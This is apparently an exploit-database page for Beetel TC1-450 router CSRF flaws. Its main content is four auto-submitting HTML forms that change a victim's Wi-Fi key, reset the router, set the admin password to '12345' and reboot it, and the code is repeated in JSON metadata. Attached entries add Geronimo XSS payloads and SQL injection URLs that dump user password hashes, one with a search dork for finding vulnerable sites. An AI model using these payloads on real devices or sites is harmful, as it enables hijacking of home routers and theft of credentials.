Search...

Beetel TC1-450 Airtel Wireless Router - Multiple CSRF Vulnerabilities

2013-12-16T00:00:00

ID 1337DAY-ID-21673
Type zdt
Reporter Samandeep Singh
Modified 2013-12-16T00:00:00

Description

Exploit for hardware platform in category web applications

                                        
                                            Technical Details
~~~~~~~~~~~~~~~~~~
Beetel 450-TC1 Wireless Router has a Cross Site Request Forgery Vulnerability in its Web Console. Attacker can easily change Wireless password,Reboot Router, Reset Router,Change Router's Admin Password by simply making the user visit a CSRF link.
 
Exploit Code 
~~~~~~~~~~~~~
 
Change Wifi (WPA2/PSK) password by CSRF
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
&lt;html&gt;
&lt;body onload="document.form.submit();"&gt;
&lt;form action="http://[VICTIM_IP]/Forms/home_wlan_1"
method="POST" name="form"&gt;
&lt;input type="hidden" name="wlanWEBFlag" value="0"&gt;
&lt;input type="hidden" name="wlan_APenable" value="1"&gt;
&lt;input type="hidden" name="Countries_Channels" value="[Any Country]"&gt;
&lt;input type="hidden" name="Channel_ID" value="00000000"&gt;
&lt;input type="hidden" name="AdvWlan_slPower" value="High"&gt;
&lt;input type="hidden" name="BeaconInterval" value="100"&gt;
&lt;input type="hidden" name="RTSThreshold" value="2347"&gt;
&lt;input type="hidden" name="FragmentThreshold" value="2346"&gt;
&lt;input type="hidden" name="DTIM" value="1"&gt;
&lt;input type="hidden" name="WirelessMode" value="802.11b+g"&gt;
&lt;input type="hidden" name="WLSSIDIndex" value="1"&gt;
&lt;input type="hidden" name="ESSID_HIDE_Selection" value="0"&gt;
&lt;input type="hidden" name="ESSID" value="[SSID of WLAN]"&gt;
&lt;input type="hidden" name="WEP_Selection" value="WPA2-PSK"&gt;
&lt;input type="hidden" name="wlanWEPFlag" value="0"&gt;
&lt;input type="hidden" name="wlanGEMTEKFlag" value="0"&gt;
&lt;input type="hidden" name="wlanGEMTEKCMDFlag" value="0"&gt;
&lt;input type="hidden" name="wlanGEMTEKDeactiveAPFlag" value="0"&gt;
&lt;input type="hidden" name="wlanRadiusWEPFlag" value="0"&gt;
&lt;input type="hidden" name="TKIP_Selection" value="AES"&gt;
&lt;input type="hidden" name="PreSharedKey" value="[WIFI PASSWORD]"&gt;
&lt;input type="hidden" name="WPARekeyInter" value="0"&gt;
&lt;input type="hidden" name="WDSMode_Selection" value="0"&gt;
&lt;input type="hidden" name="WDSEncryType_Selection" value="TKIP"&gt;
&lt;input type="hidden" name="WDSKey" value=""&gt;
&lt;input type="hidden" name="WDSPeer_MAC" value="00:00:00:00:00:00"&gt;
&lt;input type="hidden" name="WDSPeer_MAC" value="00:00:00:00:00:00"&gt;
&lt;input type="hidden" name="WDSPeer_MAC" value="00:00:00:00:00:00"&gt;
&lt;input type="hidden" name="WDSPeer_MAC" value="00:00:00:00:00:00"&gt;
&lt;input type="hidden" name="WLAN_FltActive" value="0"&gt;
&lt;input type="hidden" name="WLAN_FltAction" value="00000000"&gt;
&lt;input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00"&gt;
&lt;input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00"&gt;
&lt;input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00"&gt;
&lt;input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00"&gt;
&lt;input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00"&gt;
&lt;input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00"&gt;
&lt;input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00"&gt;
&lt;input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00"&gt;
&lt;input type="hidden" name="CountryChange" value="0"&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;
 
 
Factory Reset Router Settings by CSRF
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
&lt;html&gt;
&lt;body onload="document.form.submit();"&gt;
&lt;form action="http://[VICTIM_IP]/Forms/tools_system_1"
method="POST" name="form"&gt;
&lt;input type="hidden" name="restoreFlag" value="1"&gt;
&lt;input type="hidden" name="Restart" value="RESTART"&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;
 
 
Change Router's Admin Password by CSRF
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
&lt;html&gt;
&lt;body onload="document.form.submit();"&gt;
&lt;form action="http://[VICTIM_IP]/Forms/tools_admin_1"
method="POST" name="form"&gt;
&lt;input type="hidden" name="uiViewTools_Password" value="12345"&gt;
&lt;input type="hidden" name="uiViewTools_PasswordConfirm" value="12345"&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;
 
 
Restart Router by CSRF
~~~~~~~~~~~~~~~~~~~~~~
 
&lt;html&gt;
&lt;body onload="document.form.submit();"&gt;
&lt;form action="http://[VICTIM_IP]/Forms/tools_system_1"
method="POST" name="form"&gt;
&lt;input type="hidden" name="restoreFlag" value="0"&gt;
&lt;input type="hidden" name="Restart" value="RESTART"&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;

#  0day.today [2018-02-18]  #

JSON Vulners Source

Initial Source

{"hash": "d01dcc39ebb1e90d54cec0424c7b22959faf8277b6ec064f018d4832c6d25666", "id": "1337DAY-ID-21673", "lastseen": "2018-02-18T17:22:57", "viewCount": 5, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "2bebc19b72bd95e98513647d258e7828", "key": "description"}, {"hash": "2afc714b7240ddc0ebdb9877d89c5c74", "key": "href"}, {"hash": "5723a7254c7f56cd82fa73b4ecb3b5c2", "key": "modified"}, {"hash": "5723a7254c7f56cd82fa73b4ecb3b5c2", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "250b5c7d37ce433495a90035bdc68054", "key": "reporter"}, {"hash": "34a5f1b926a5cbd95857cbf470730a66", "key": "sourceData"}, {"hash": "f271157494a7eab2da2dc917174e68e6", "key": "sourceHref"}, {"hash": "5f833b8008ef2b037073c60e4e6f18a4", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2018-02-18T17:22:57"}, "vulnersScore": 4.3}, "type": "zdt", "sourceHref": "https://0day.today/exploit/21673", "description": "Exploit for hardware platform in category web applications", "title": "Beetel TC1-450 Airtel Wireless Router - Multiple CSRF Vulnerabilities", "history": [{"bulletin": {"hash": "46817bb176f1944a73b1e51c5808c43cfa401b5f97d8367de0eead06a83dacf6", "id": "1337DAY-ID-21673", "lastseen": "2016-04-20T01:14:37", "enchantments": {"score": {"value": 5.7, "modified": "2016-04-20T01:14:37"}}, "hashmap": [{"hash": "f804be2b75f9dafe87d442dd77fe54dd", "key": "href"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "5f833b8008ef2b037073c60e4e6f18a4", "key": "title"}, {"hash": "2bebc19b72bd95e98513647d258e7828", "key": "description"}, {"hash": "250b5c7d37ce433495a90035bdc68054", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "5723a7254c7f56cd82fa73b4ecb3b5c2", "key": "published"}, {"hash": "e2d3b5e7ee5ef2402b827b89c455aedd", "key": "sourceHref"}, {"hash": "bc0509c57d8aba466102bb2a276dfc96", "key": "sourceData"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "5723a7254c7f56cd82fa73b4ecb3b5c2", "key": "modified"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/21673", "description": "Exploit for hardware platform in category web applications", "viewCount": 0, "title": "Beetel TC1-450 Airtel Wireless Router - Multiple CSRF Vulnerabilities", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "Technical Details\r\n~~~~~~~~~~~~~~~~~~\r\nBeetel 450-TC1 Wireless Router has a Cross Site Request Forgery Vulnerability in its Web Console. Attacker can easily change Wireless password,Reboot Router, Reset Router,Change Router's Admin Password by simply making the user visit a CSRF link.\r\n \r\nExploit Code \r\n~~~~~~~~~~~~~\r\n \r\nChange Wifi (WPA2/PSK) password by CSRF\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n \r\n<html>\r\n<body onload=\"document.form.submit();\">\r\n<form action=\"http://[VICTIM_IP]/Forms/home_wlan_1\"\r\nmethod=\"POST\" name=\"form\">\r\n<input type=\"hidden\" name=\"wlanWEBFlag\" value=\"0\">\r\n<input type=\"hidden\" name=\"wlan_APenable\" value=\"1\">\r\n<input type=\"hidden\" name=\"Countries_Channels\" value=\"[Any Country]\">\r\n<input type=\"hidden\" name=\"Channel_ID\" value=\"00000000\">\r\n<input type=\"hidden\" name=\"AdvWlan_slPower\" value=\"High\">\r\n<input type=\"hidden\" name=\"BeaconInterval\" value=\"100\">\r\n<input type=\"hidden\" name=\"RTSThreshold\" value=\"2347\">\r\n<input type=\"hidden\" name=\"FragmentThreshold\" value=\"2346\">\r\n<input type=\"hidden\" name=\"DTIM\" value=\"1\">\r\n<input type=\"hidden\" name=\"WirelessMode\" value=\"802.11b+g\">\r\n<input type=\"hidden\" name=\"WLSSIDIndex\" value=\"1\">\r\n<input type=\"hidden\" name=\"ESSID_HIDE_Selection\" value=\"0\">\r\n<input type=\"hidden\" name=\"ESSID\" value=\"[SSID of WLAN]\">\r\n<input type=\"hidden\" name=\"WEP_Selection\" value=\"WPA2-PSK\">\r\n<input type=\"hidden\" name=\"wlanWEPFlag\" value=\"0\">\r\n<input type=\"hidden\" name=\"wlanGEMTEKFlag\" value=\"0\">\r\n<input type=\"hidden\" name=\"wlanGEMTEKCMDFlag\" value=\"0\">\r\n<input type=\"hidden\" name=\"wlanGEMTEKDeactiveAPFlag\" value=\"0\">\r\n<input type=\"hidden\" name=\"wlanRadiusWEPFlag\" value=\"0\">\r\n<input type=\"hidden\" name=\"TKIP_Selection\" value=\"AES\">\r\n<input type=\"hidden\" name=\"PreSharedKey\" value=\"[WIFI PASSWORD]\">\r\n<input type=\"hidden\" name=\"WPARekeyInter\" value=\"0\">\r\n<input type=\"hidden\" name=\"WDSMode_Selection\" value=\"0\">\r\n<input type=\"hidden\" name=\"WDSEncryType_Selection\" value=\"TKIP\">\r\n<input type=\"hidden\" name=\"WDSKey\" value=\"\">\r\n<input type=\"hidden\" name=\"WDSPeer_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WDSPeer_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WDSPeer_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WDSPeer_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLAN_FltActive\" value=\"0\">\r\n<input type=\"hidden\" name=\"WLAN_FltAction\" value=\"00000000\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"CountryChange\" value=\"0\">\r\n</form>\r\n</body>\r\n</html>\r\n \r\n \r\nFactory Reset Router Settings by CSRF\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n \r\n<html>\r\n<body onload=\"document.form.submit();\">\r\n<form action=\"http://[VICTIM_IP]/Forms/tools_system_1\"\r\nmethod=\"POST\" name=\"form\">\r\n<input type=\"hidden\" name=\"restoreFlag\" value=\"1\">\r\n<input type=\"hidden\" name=\"Restart\" value=\"RESTART\">\r\n</form>\r\n</body>\r\n</html>\r\n \r\n \r\nChange Router's Admin Password by CSRF\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n \r\n<html>\r\n<body onload=\"document.form.submit();\">\r\n<form action=\"http://[VICTIM_IP]/Forms/tools_admin_1\"\r\nmethod=\"POST\" name=\"form\">\r\n<input type=\"hidden\" name=\"uiViewTools_Password\" value=\"12345\">\r\n<input type=\"hidden\" name=\"uiViewTools_PasswordConfirm\" value=\"12345\">\r\n</form>\r\n</body>\r\n</html>\r\n \r\n \r\nRestart Router by CSRF\r\n~~~~~~~~~~~~~~~~~~~~~~\r\n \r\n<html>\r\n<body onload=\"document.form.submit();\">\r\n<form action=\"http://[VICTIM_IP]/Forms/tools_system_1\"\r\nmethod=\"POST\" name=\"form\">\r\n<input type=\"hidden\" name=\"restoreFlag\" value=\"0\">\r\n<input type=\"hidden\" name=\"Restart\" value=\"RESTART\">\r\n</form>\r\n</body>\r\n</html>\n\n# 0day.today [2016-04-20] #", "published": "2013-12-16T00:00:00", "references": [], "reporter": "Samandeep Singh", "modified": "2013-12-16T00:00:00", "href": "http://0day.today/exploit/description/21673"}, "lastseen": "2016-04-20T01:14:37", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "Technical Details\r\n~~~~~~~~~~~~~~~~~~\r\nBeetel 450-TC1 Wireless Router has a Cross Site Request Forgery Vulnerability in its Web Console. Attacker can easily change Wireless password,Reboot Router, Reset Router,Change Router's Admin Password by simply making the user visit a CSRF link.\r\n \r\nExploit Code \r\n~~~~~~~~~~~~~\r\n \r\nChange Wifi (WPA2/PSK) password by CSRF\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n \r\n<html>\r\n<body onload=\"document.form.submit();\">\r\n<form action=\"http://[VICTIM_IP]/Forms/home_wlan_1\"\r\nmethod=\"POST\" name=\"form\">\r\n<input type=\"hidden\" name=\"wlanWEBFlag\" value=\"0\">\r\n<input type=\"hidden\" name=\"wlan_APenable\" value=\"1\">\r\n<input type=\"hidden\" name=\"Countries_Channels\" value=\"[Any Country]\">\r\n<input type=\"hidden\" name=\"Channel_ID\" value=\"00000000\">\r\n<input type=\"hidden\" name=\"AdvWlan_slPower\" value=\"High\">\r\n<input type=\"hidden\" name=\"BeaconInterval\" value=\"100\">\r\n<input type=\"hidden\" name=\"RTSThreshold\" value=\"2347\">\r\n<input type=\"hidden\" name=\"FragmentThreshold\" value=\"2346\">\r\n<input type=\"hidden\" name=\"DTIM\" value=\"1\">\r\n<input type=\"hidden\" name=\"WirelessMode\" value=\"802.11b+g\">\r\n<input type=\"hidden\" name=\"WLSSIDIndex\" value=\"1\">\r\n<input type=\"hidden\" name=\"ESSID_HIDE_Selection\" value=\"0\">\r\n<input type=\"hidden\" name=\"ESSID\" value=\"[SSID of WLAN]\">\r\n<input type=\"hidden\" name=\"WEP_Selection\" value=\"WPA2-PSK\">\r\n<input type=\"hidden\" name=\"wlanWEPFlag\" value=\"0\">\r\n<input type=\"hidden\" name=\"wlanGEMTEKFlag\" value=\"0\">\r\n<input type=\"hidden\" name=\"wlanGEMTEKCMDFlag\" value=\"0\">\r\n<input type=\"hidden\" name=\"wlanGEMTEKDeactiveAPFlag\" value=\"0\">\r\n<input type=\"hidden\" name=\"wlanRadiusWEPFlag\" value=\"0\">\r\n<input type=\"hidden\" name=\"TKIP_Selection\" value=\"AES\">\r\n<input type=\"hidden\" name=\"PreSharedKey\" value=\"[WIFI PASSWORD]\">\r\n<input type=\"hidden\" name=\"WPARekeyInter\" value=\"0\">\r\n<input type=\"hidden\" name=\"WDSMode_Selection\" value=\"0\">\r\n<input type=\"hidden\" name=\"WDSEncryType_Selection\" value=\"TKIP\">\r\n<input type=\"hidden\" name=\"WDSKey\" value=\"\">\r\n<input type=\"hidden\" name=\"WDSPeer_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WDSPeer_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WDSPeer_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WDSPeer_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLAN_FltActive\" value=\"0\">\r\n<input type=\"hidden\" name=\"WLAN_FltAction\" value=\"00000000\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"CountryChange\" value=\"0\">\r\n</form>\r\n</body>\r\n</html>\r\n \r\n \r\nFactory Reset Router Settings by CSRF\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n \r\n<html>\r\n<body onload=\"document.form.submit();\">\r\n<form action=\"http://[VICTIM_IP]/Forms/tools_system_1\"\r\nmethod=\"POST\" name=\"form\">\r\n<input type=\"hidden\" name=\"restoreFlag\" value=\"1\">\r\n<input type=\"hidden\" name=\"Restart\" value=\"RESTART\">\r\n</form>\r\n</body>\r\n</html>\r\n \r\n \r\nChange Router's Admin Password by CSRF\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n \r\n<html>\r\n<body onload=\"document.form.submit();\">\r\n<form action=\"http://[VICTIM_IP]/Forms/tools_admin_1\"\r\nmethod=\"POST\" name=\"form\">\r\n<input type=\"hidden\" name=\"uiViewTools_Password\" value=\"12345\">\r\n<input type=\"hidden\" name=\"uiViewTools_PasswordConfirm\" value=\"12345\">\r\n</form>\r\n</body>\r\n</html>\r\n \r\n \r\nRestart Router by CSRF\r\n~~~~~~~~~~~~~~~~~~~~~~\r\n \r\n<html>\r\n<body onload=\"document.form.submit();\">\r\n<form action=\"http://[VICTIM_IP]/Forms/tools_system_1\"\r\nmethod=\"POST\" name=\"form\">\r\n<input type=\"hidden\" name=\"restoreFlag\" value=\"0\">\r\n<input type=\"hidden\" name=\"Restart\" value=\"RESTART\">\r\n</form>\r\n</body>\r\n</html>\n\n# 0day.today [2018-02-18] #", "published": "2013-12-16T00:00:00", "references": [], "reporter": "Samandeep Singh", "modified": "2013-12-16T00:00:00", "href": "https://0day.today/exploit/description/21673"}

{"securityvulns": [{"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "description": "\r\n\r\nOriginal advisory http://dsecrg.com/pages/vul/show.php?id=119\r\n\r\n\r\nDigital Security Research Group [DSecRG] Advisory #DSECRG-09-019\r\n\r\nApplication: Apache Geronimo Application Server\r\nVersions Affected: 2.1 - 2.1.3\r\nVendor URL: http://geronimo.apache.org/\r\nBug: Multiple XSS Vulnerabilities\r\nExploits: YES\r\nReported: 10.12.2008\r\nVendor response: 10.12.2008\r\nSolution: YES \r\nDate of Public Advisory: 16.04.2009\r\nCVE-number: 2009-0038\r\nAuthor: Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)\r\n\r\n\r\n\r\nDescription\r\n***********\r\n\r\nGeronimo Server Console multiple XSS vulnerabilities.\r\n\r\nVarious linked and stored cross-site scripting (XSS) vulnerabilities were found in the Apache Geronimo administrative\r\nconsole and related utilities.\r\n\r\nThis affects all full JavaEE Geronimo releases or other distributions which include the administration web console up to\r\nand including Geronimo 2.1.3.\r\n\r\n\r\n\r\nDetails\r\n*******\r\n\r\nUsing this vulnerability attacker can steal administrator's cookie and then authentificate as administrator or perform\r\ncertain administrative actions.\r\n\r\n1. Linked XSS vulnerability.\r\n\r\nAttacker can inject XSS in URL string.\r\n\r\nExample:\r\n\r\nhttp://[server]/console/portal/"><script>alert('DSecRG XSS')</script><!--\r\n\r\n\r\n2. Multiple Stored XSS vulnerabilities found in script \r\n\r\n/console/portal/Server/Monitoring\r\n\r\nVulnerable parameters: "name", "ip", "username", "description".\r\n\r\nAttacker can inject scripts into monitorings.\r\n\r\nExample [Monitoring - Create View]:\r\n\r\nname = <script>alert('DSecRG XSS')</script>\r\ndescription = </textarea><script>alert("DSecRG XSS")</script>\r\n\r\nor\r\n\r\nhttp://[server]/console/portal//Server/Monitoring/__ac0x3monitoring0x2monitoring!126896788|0/__pm0x3monitoring0x2monitoring!126896788|0_edit?action=saveAddView&name="><script>alert("DSecRG\r\nXSS")</script>&description=</textarea><script>alert("DSecRG XSS")</script>\r\n\r\n\r\n\r\nSolution\r\n********\r\n\r\nThis s\r\n\r\necurity vulnerabilities fixed in Geronimo 2.1.4 release.\r\n\r\nNew version of Geronimo 2.1.4 can be downloaded from this location:\r\n\r\nhttp://geronimo.apache.org/downloads.html\r\n\r\nAn alternative workaround (if you choose to not upgrade to Apache Geronimo 2.1.4) would be to stop or undeploy the\r\nadministration web console application in the server.\r\n\r\nCredits\r\n*******\r\n\r\nhttp://geronimo.apache.org/21x-security-report.html#2.1.xSecurityReport-214\r\n\r\n\r\n\r\nAbout\r\n*****\r\n\r\nDigital Security is leading IT security company in Russia, providing information security consulting, audit and\r\npenetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS\r\nstandards. \r\nDigital Security Research Group focuses on web application and database security problems with vulnerability reports,\r\nadvisories and whitepapers posted regularly on our website.\r\n\r\nContact: research [at] dsecrg [dot] com\r\n http://www.dsecrg.com \r\n http://www.dsec.ru\r\n\r\n\r\nRegards,\r\nDigital Security Research Group [DSecRG]\r\n________________________________________\r\nDIGITAL SECURITY\r\ntel/fax: +7(812)703-1547\r\ntel: +7(812)430-9130\r\ne-mail: research@dsecrg.com\r\nweb: www.dsecrg.com\r\n----------------------------------------\r\nThis message and any attachment are confidential and may be privileged \r\nor otherwise protected from disclosure. If you are not the intended \r\nrecipient any use, distribution, copying or disclosure is strictly \r\nprohibited. If you have received this message in error, please notify \r\nthe sender immediately either by telephone or by e-mail and delete this \r\nmessage and any attachment from your system. Correspondence via e-mail \r\nis for information purposes only. Digital Security neither makes nor \r\naccepts legally binding statements by e-mail unless otherwise agreed. \r\n----------------------------------------", "modified": "2009-04-17T00:00:00", "published": "2009-04-17T00:00:00", "id": "SECURITYVULNS:DOC:21673", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21673", "title": "[DSECRG-09-019] Apache Geronimo - XSS vulnerabilities.txt", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:19", "bulletinFamily": "software", "description": "TITLE:\r\nIBM AIX dtterm Privilege Escalation Vulnerability\r\n\r\nSECUNIA ADVISORY ID:\r\nSA21673\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/21673/\r\n\r\nCRITICAL:\r\nLess critical\r\n\r\nIMPACT:\r\nPrivilege escalation\r\n\r\nWHERE:\r\nLocal system\r\n\r\nOPERATING SYSTEM:\r\nAIX 5.x\r\nhttp://secunia.com/product/213/\r\n\r\nDESCRIPTION:\r\nA vulnerability has been reported in IBM AIX, which can be exploited\r\nby malicious, local users to gain escalated privileges.\r\n\r\nThe vulnerability is caused due to an unspecified error in dtterm and\r\nallows execution of arbitrary code with root privileges.\r\n\r\nSOLUTION:\r\nApply APARs.\r\n\r\nAIX 5.3:\r\nApply APAR IY89052.\r\n\r\nAIX 5.2:\r\nApply APAR IY89045.\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nReported by the vendor.\r\n\r\nORIGINAL ADVISORY:\r\nIBM:\r\nhttp://www-1.ibm.com/support/docview.wss?uid=isg1IY89052\r\nhttp://www-1.ibm.com/support/docview.wss?uid=isg1IY89045\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.", "modified": "2006-08-31T00:00:00", "published": "2006-08-31T00:00:00", "id": "SECURITYVULNS:DOC:14108", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14108", "title": "[SA21673] IBM AIX dtterm Privilege Escalation Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-03-19T21:10:35", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2007-12-09T00:00:00", "published": "2007-12-09T00:00:00", "id": "1337DAY-ID-2346", "href": "https://0day.today/exploit/description/2346", "type": "zdt", "title": "Content Injector 1.53 (index.php) Remote SQL Injection Vulnerability", "sourceData": "====================================================================\r\nContent Injector 1.53 (index.php) Remote SQL Injection Vulnerability\r\n====================================================================\r\n\r\n\r\n\r\n--==+================================================================================+==--\r\n--==+ Content Injector V1.53 SQL Injection Vulnerbility +==--\r\n--==+================================================================================+==--\r\n\r\n\r\nAUTHOR: S.W.A.T.\r\n\r\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nDownload: http://www.p3mbo.com/cinj153.zip\r\n\r\n-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nDORK (google): \"Powered by Content Injector v1.53\"\r\nDork2(google): Powered by Content Injector v1.53\r\n\r\n-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nDESCRIPTION:\r\nYou Can See Admin User & MD5 Password ..::.. Then You Can Crack It ;) \r\n\r\n-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nEXPLOITS:\r\nwww.site.com/index.php?action=expand&id=99999/**/union/**/select/**/1,2,username,4,5,password,7,8,9/**/from/**/users/*\r\n\r\n-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nNOTE/TIP:\r\nadmin login is at /admin/ It Is New Version With New Query & Different Between The Last One I Found\r\n\r\n-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nAbout Me:\r\nMaybe I Give Bye To NET :( 1 month later :((\r\n\r\nI'm Suposed To Die These Days\r\n\r\n-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nGREETZ: All Xmors Digital Security Team \r\n\r\n\r\n--==+================================================================================+==--\r\n--==+ Content Injector V1.53 SQL Injection Vulnerbility +==--\r\n--==+================================================================================+==--\r\n\r\n\r\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/2346"}, {"lastseen": "2018-01-05T13:07:39", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2007-12-09T00:00:00", "published": "2007-12-09T00:00:00", "id": "1337DAY-ID-2347", "href": "https://0day.today/exploit/description/2347", "type": "zdt", "title": "Ace Image Hosting Script (id) Remote SQL Injection Vulnerability", "sourceData": "================================================================\r\nAce Image Hosting Script (id) Remote SQL Injection Vulnerability\r\n================================================================\r\n\r\n\r\n\r\n--==+================================================================================+==--\r\n--==+\t\t Ace Image Hosting Script SQL Injection Vulnerbility\t +==--\r\n--==+================================================================================+==--\r\n\r\n\r\n\r\nAUTHOR: t0pP8uZz & xprog\r\nSITE: N/A\r\nDORK: N/A\r\n\r\n\r\nDESCRIPTION: \r\npull user's info from the database\r\n\r\n\r\nEXPLOITS:\r\nwww.site.com/albums.php?mode=editalbum&id=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(user,char(58),password),3/**/FROM/**/users/**/LIMIT/**/0,1/*\r\n\r\n\r\nNOTE/TIP:\r\nadmin login is at 